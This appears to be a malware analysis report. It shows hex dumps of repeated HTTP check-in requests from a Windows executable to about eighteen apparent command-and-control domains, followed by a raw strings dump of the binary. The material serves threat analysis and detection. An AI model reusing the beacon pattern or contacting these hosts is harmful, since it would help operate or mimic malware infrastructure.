0x00000070 (00112)   3a206c61 6c6f706f 6e65612e 636f6d0d   : laloponea.com.
0x00000080 (00128)   0a0d0a0a 0d0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206461 76656465 6b696c61 692e636f   : davedekilai.co
0x00000080 (00128)   6d0d0a0d 0a0a                         m.....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207175 69636b6c 6976652e 6e65740d   : quicklive.net.
0x00000080 (00128)   0a0d0a0d 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207175 69636b73 65727665 2e6e6574   : quickserve.net
0x00000080 (00128)   0d0a0d0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20636c 6f75646d 696e652e 6e65740d   : cloudmine.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206461 726b6d69 6e652e6e 65740d0a   : darkmine.net..
0x00000080 (00128)   0d0a0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20636c 6f75646c 6976652e 6e65740d   : cloudlive.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206461 726b6c69 76652e6e 65740d0a   : darklive.net..
0x00000080 (00128)   0d0a0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20636c 6f756473 65727665 2e6e6574   : cloudserve.net
0x00000080 (00128)   0d0a0d0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206d69 6c6b686f 7573652e 6e65740d   : milkhouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207769 7468686f 7573652e 6e65740d   : withhouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207769 74686769 66742e6e 65740d0a   : withgift.net..
0x00000080 (00128)   0d0a0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207369 67687467 6966742e 6e65740d   : sightgift.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206361 7365686f 7573652e 6e65740d   : casehouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206865 6164686f 7573652e 6e65740d   : headhouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207175 69636b68 6f757365 2e6e6574   : quickhouse.net
0x00000080 (00128)   0d0a0d0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207175 69636b67 6966742e 6e65740d   : quickgift.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207369 636b686f 7573652e 6e65740d   : sickhouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......


Strings
 ' 
\
.
..
..
...
...
.......... .!"!#!.$%$0&$'$.
(
.
.
.
.
.
.
.
.
)*
)
+,+
-.-/01210/-3-
[
Z
[
Z
[
+%3D%3A%26A&
-_
h1
21212
+
.
.
dll2
h2
1
1
exe
:
:
  ---
ss
 
.
 0
a
 
 
"
 
ta.al3te
eCbee
eelArtE
TFeKraSlvrevlnoeeidceerantjaedHCepe2ilEtS
O
ontnltSsdCh
Wgnrle
"1"
2dll1exe
S
%+#.*fa
0e
%+#I64o
.,
 -
00-+ 
.CC
 
.
-e-
. 
00-+ 
-E-
-0
-0010+-0
0
-0
\
.
  :\
:..00...........?- 
0
0
0
0
-
.
D
..
.
.....
$.
.u
                                 H
         (((((                  H
         h((((                  H
jjjh
jjjjh
jjjjj
KERNEL32.DLL
Kjjj
Kjjjj
Ljjj
Mjjj
mscoree.dll
(null)
                          
																		
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
[0%I\Z
0&m!*!
	0P,6#}
0SSSSS
0WWWWW
!0X[q"
`^1`0v
!1Ba9D
1#QNAN
1#SNAN
-1WOH"^
>|1yB[c
2,C{1n^VD
2i[Z+~Uq
2OV-~2R
2q#Il7
=3|zy|
4[/6`':
4jB*G{c
4\$,}M
	(5\'6`
[:5eaf,
5t(w5y
5?ZqxIviRJ
62{hAX
6i>|;S
_7Q'bYXW
.>^8<%
8@$BuFCV
8dCZt]8
]8MeVo
8mL\.j
8OZ7Is
8^-&sJ
8VVVVV
_.[+9~
=}+^,^{98
9&-q?<
9qB{&JD
9U9yfc|
${9xoj
 +&9Z~|
A,3XA8Eq
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
:A~C47'
Ac-jn=@
,aHO:7
america
american
american english
american-english
An application has made an attempt to load the C runtime library incorrectly.
aNFp)&
[Ao<x/H
<at9<rt,<wt
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
.?AUctype_base@std@@
August
australian
av2~35
.?AVbad_alloc@std@@
.?AVbad_cast@std@@
.?AVbad_exception@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$ctype@D@std@@
.?AVexception@std@@
.?AVfacet@locale@std@@
.?AVfailure@ios_base@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AVlength_error@std@@
.?AV_Locimp@locale@std@@
.?AVlogic_error@std@@
.?AV?$numpunct@D@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
AvnZ<f;F
.?AVout_of_range@std@@
.?AVruntime_error@std@@
.?AVtype_info@@
\azJo D
$B)1bH
bad allocation
bad cast
bad exception
 Base Class Array'
 Base Class Descriptor at (
__based(
BeginPaint
belgian
 Bl<b8
bmcLjh
Bp48,Y
b'r@1_L
britain
B\!vSr@
b=ZzqG
$>$`C1
C3e}-m
CallWindowProcA
canadian
__cdecl
cg?*4ov.
CheckDlgButton
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
 Class Hierarchy Descriptor'
CloseHandle
__clrcall
cmd.exe
)cnPCSY
CompareStringA
CompareStringW
 Complete Object Locator'
COMSPEC
CONOUT$
`copy constructor closure'
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
CorExitProcess
C PjPV
C$PjQV
C.PjRV
C/PjSV
C*PjTV
C+PjUV
C,PjVV
C-PjWV
CqCpiS
CrAd!9
CreateFileA
CreateProcessA
CreateThread
- CRT not initialized
_C[xx6
C(Y^7W
D3Y3XA+
`d76bo
@.data
dddd, MMMM dd, yyyy
d-dH2^H
December
DecodePointer
`default constructor closure'
 delete
 delete[]
Delete
DeleteCriticalSection
DeleteFileA
deque<T> too long
DjnmXK
DN\'p`4
+`dNQE
DOMAIN error
DrawTextA
dutch-belgian
D`vu"0
`dynamic atexit destructor for '
`dynamic initializer for '
>e1(&i
e]7(;}
ebDypMD
E!bl]5;:
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
e"HwuC
Em]MMv
EnableWindow
EncodePointer
EndDialog
EndPaint
england
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
EnterCriticalSection
EnumSystemLocalesA
eNw6e1
eQLP,9
eRo.K)
ESUrVQ
ExitProcess
f0p$QS
F7^l#eJ
__fastcall
February
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
FindResourceA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
ForceRemove
fpY-38
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
french-belgian
french-canadian
french-luxembourg
french-swiss
Friday
,fTc"FD
^F<-uB
$f.~WE
FW=^GE]
FxAZ#<
GAIsProcessorFeaturePresent
{gc,WG
Gd74CJ
GDI32.dll
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
GetACP
GetActiveWindow
GetBkColor
GetClipRgn
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryA
GetCurrentObject
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetCursor
GetDCBrushColor
GetDCPenColor
GetDeviceCaps
GetDialogBaseUnits
GetDlgItem
GetDlgItemInt
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetExitCodeProcess
GetFileAttributesA
GetFileTime
GetFileType
GetFontLanguageInfo
GetForegroundWindow
GetFullPathNameA
GetGraphicsMode
GetInputState
GetKeyboardType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocaleInfoW
GetMapMode
GetMenu
GetMenuCheckMarkDimensions
GetMenuContextHelpId
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMetaRgn
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetNearestPaletteIndex
GetObjectType
GetOEMCP
GetPixelFormat
GetProcAddress
GetProcessHeap
GetProcessId
GetProcessWindowStation
GetPropA
GetRandomRgn
GetScrollPos
GetStartupInfoA
GetStdHandle
GetStretchBltMode
GetStringTypeA
GetStringTypeW
GetSystemPaletteUse
GetSystemTimeAsFileTime
GetTextAlign
GetTextCharset
GetTextCharsetInfo
GetTextColor
GetTickCount
GetTimeZoneInformation
GetUserDefaultLCID
GetUserObjectInformationA
GetVersion
GetWindowContextHelpId
GetWindowDC
GetWindowLongA
-gF;Qo
}GGyNE
}G;}lN~t
GlobalAlloc
GlobalHandle
GlobalSize
G|l'Sh
%G#	m(
great britain
G[s0S9
GS*xwg
`h````
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
H~Fan>xe`
.H^fj0
$!hfnRi
hGV'>W
`h`hhh
HH:mm:ss
HHtXHHt
HHtYHHt
hIV7Q*69
holland
hong-kong
,hu+id
hxnkkSh
|I9;3G
>If90t
^;#IlI@
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
invalid map/set<T> iterator
invalid string position
ios_base::badbit set
ios_base::failbit set
IqMX_bW0
irish-english
IsDebuggerPresent
IsProcessorFeaturePresent
IsValidCodePage
IsValidLocale
IsWindowEnabled
IsWindowUnicode
italian-swiss
;iz'b4=WD
j2h8RL
j2hhSL
j`4bFQ(
+.\?`j7
jahPjM
JanFebMarAprMayJunJulAugSepOctNovDec
January
jbhX&M
je!&*Z
j$hDkM
j!h@fM
j.h\gL
j	h<hL
j	h kM
j	h,kM
j,hleM
j	hlTL
j#h\	M
j	hpRL
j_hPuM
j"ht%M
j	htoL
j	hTOM
j!h,vM
j@j ^V
{~jjwE
jMhHgM
JP*;0(
j"^SSSSS
j'T!+%w
j{uC3c
'*JV;(%
k0Q){0
KERNEL32
KERNEL32.dll
'kR{SKV
KU8HCb~
L0d`d>20
+l2j[MC
l9H[xY
}^#'LaA
LC_ALL
LC_COLLATE
LC_CTYPE
LCMapStringA
LCMapStringW
LC_MONETARY
LC_NUMERIC
LC_TIME
LeaveCriticalSection
Lhbs8,
,l/iDd^
LJy[%u
lkz"!~
LoadIconA
LoadLibraryA
LoadResource
LocalAlloc
LocalFlags
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
LockResource
lzO?*s7
M9mE7&
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
map/set<T> too long
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
MoveFileA
MoveWindow
mrDy@e
MultiByteToWideChar
n0:RhE
Na3^'y
|-$Ndu
 new[]
new-zealand
n"[hW85(p
(nlQXRm
N:mvWN
NoRemove
norwegian
norwegian-bokmal
norwegian-nynorsk
Norwegian-Nynorsk
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
(null)
NX$[0y
October
OEdz"NB
ofj${a
Ojl[S,
OLEAUT32.dll
`omni callsig'
o,*_Or
operator
)O-PLz
\	OR./
~+O\U<
O|?vr27
OX_'.(a
!O$-zx
__pascal
PBTZiR
PE8yq2
p	@-@f/
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
portuguese-brazilian
PostMessageA
p'P	KL
PPPPPPPP
pr china
pr-china
Program: 
<program name unknown>
__ptr64
puerto-rico
- pure virtual function call
Q}68p>
ql2t_.r
'QLXcx=,
QQSVWd
Q[+SS_
QueryPerformanceCounter
_Q<vN~
q[z<W(%
r0~/mN
R*4d)D/
~R-4smQ
r<6G9t
RaiseException
\RBwRnS
rc!tic
`.rdata
ReadFile
__restrict
R_E\Xo,
rF'|9[
RmuJ|/v
Rqu1^l
RtlUnwind
R<uN68
runtime error 
Runtime Error!
RWE7SZ 
S1%c;K
S5KO<"
Saturday
`scalar deleting destructor'
sdH-32$E
SendMessageA
September
SetDlgItemTextA
SetEndOfFile
SetEnvironmentVariableA
SetFilePointer
SetFocus
SetHandleCount
SetLastError
SetPixel
SetStdHandle
SetSystemPaletteUse
SetTextAlign
SetTextColor
SetTextJustification
SetUnhandledExceptionFilter
SetWindowTextA
S#f'jO
ShowWindow
Si1TnvV7K
SING error
SizeofResource
slovak
^S"|Ma#
south africa
south-africa
south korea
south-korea
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
s[S;7|G;w
^SSSSS
__stdcall
`string'
string too long
Sunday
SunMonTueWedThuFriSat
s{;^/v
swedish-finland
SystemRoot
t3h$HK
t4zYR`
TarRAbk
tdhX4K
$\TeK8
TerminateProcess
t=FA9]
tGHt.Ht&
(</t$h
t$h\AK
+t HHt
tHhT5K
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
tH@"p$
t hp7K
t=h(RK
Thursday
tIE sc|l
tIj"[:
t[JBErW
tjh(4K
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
<\tM</tI
tNh,RK
tqz0EP
tR99u2
trinidad & tobago
t"SS9]
^t=svm
<+t(<-t$:
t$<"u	3
Tuesday
tulc{x
;t$,v-
t VV9u
t+WWVPV
 Type Descriptor'
`typeof'
U2a{#'+
>:u8FV
`udt returning'
ugjLhHdM
u%h0RK
_Uh}DH
u&hPGK
u`I13'
u_l@z@
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UNICODE
united-kingdom
united-states
Unknown exception
uo_W+q
UpdateColors
UQPXY]Y[
uqSSSSS
URPQQh
USER32.dll
USER32.DLL
u[SSSP
UTF-16LE
uvj	hpRL
u,VVWV
V7NM)_
V7.qXn
`vbase destructor'
`vbtable'
`vcall'
vcpab M
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`vftable'
VirtualAlloc
`virtual displacement map'
VirtualFree
Vj@hPOK
-VlCrj
v	N+D$
V@NH{x
VQUloF
?v??qZ
_VVVVV
VVVVVQRSSj
v"Y|zV
W"4=hUv?
WaitForSingleObject
Wednesday
wHh45K
WideCharToMultiByte
WindowFromDC
W+	p_'
~'!wQ\Zt
W?Rc o]M++
WriteConsoleA
WriteConsoleW
WriteFile
WS2_32.dll
^WWWWW
WYl.eX
_X/4X.
"'X7kV
@xF7|\ri
#x}!Ie
Xm<KVd
xnl\QR
xppwpp
xp?uOVr
xpxxxx
<xtX<XtT
x V'N8V>/
?XwpxYk
y68:vW+
yDyXW"
{[)y=E
y=iI]Z@Af
Y@ios_base::eofbit set
>y	M!B
])Yn"~
!yo Tu
ys;V F
>=Yt1j
YtY$Q=s8
Y<\u#j\V
YUM1>N*
YU^Q+w
&Y{~vq
: ze^%
z/j9fj
ZL6t8!o
ZXYO-,